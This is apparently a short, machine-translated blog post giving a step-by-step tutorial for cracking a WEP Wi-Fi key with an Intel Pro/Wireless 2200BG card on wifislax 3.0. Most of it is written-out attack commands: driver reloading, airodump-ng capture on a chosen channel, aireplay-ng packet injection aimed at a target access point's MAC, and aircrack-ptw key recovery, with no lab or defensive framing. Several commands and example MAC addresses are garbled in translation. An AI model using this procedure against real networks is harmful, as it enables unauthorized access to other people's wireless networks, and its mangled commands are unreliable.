I leave you a tutorial to crack wep key with the Intel Pro / Wireless 2200BG. This tutorial I did not, I'll send you a cousin who were seeking ways to do it with this card. We did it using wifislax 3.0 and the following steps: We use three shell
's. The process is in the order written.
Shell 1
- Type: rmmod ipw2200
- Type: modprobe ipw2200 rtap_iface = 1 (Both steps are to enable the ipw2200 drivers apparently are not activated by default in the wifislax 3.0)
- Type: iwconfig (to verify that interfaces are active)
- If there are interfaces, type: airodump-ng rtap0 (to see what networks are available)
- Press: Control + C (to stop the process)
- Type: airodump-ng-c * # -w wep rtap0 (symbol * # must be replaced by the number of network channel with more power than is defined by the column rxq, the higher the better) Example: airodump-ng-c 6-w rtap0 wep (wep is the name of the file that will capture the packets.
- Type: iwconfig eth1 essid NAME OF NETWORK
- Type: iwconfig (to verify that we are partners, we will see the name of the network that are related to the interface eth1, I think, that I do not remember)
- Type: aireplay-ng -3 X 1024-g 1000000-b OBJECTIVE MAC-h MAC WHERE WE ARE DOING THE PROCESS -i eth1 rtap0 Example: aireplay-ng -3-x 1024-g 1000000-b 00:18 : 3D: 87:3 S: 35-h 00:73:7 F: K2: 87:53-i eth1 rtap0 (This is to start injecting packets to the access point that is the target mac)
- together Wait at least 20,000 packages
DATA
- Type: aircrack-ptw wep-01.cap
- Ready! The key is the hexadecimal digits displayed. Usually they are just numbers and are 10, if a key of 128 bits would be 26 hexadecimal digits.
As always, questions and suggestions in the comments. I hope I can help.UPDATE: The username and password is asking Username: root - Password: toor
0 comments:
Post a Comment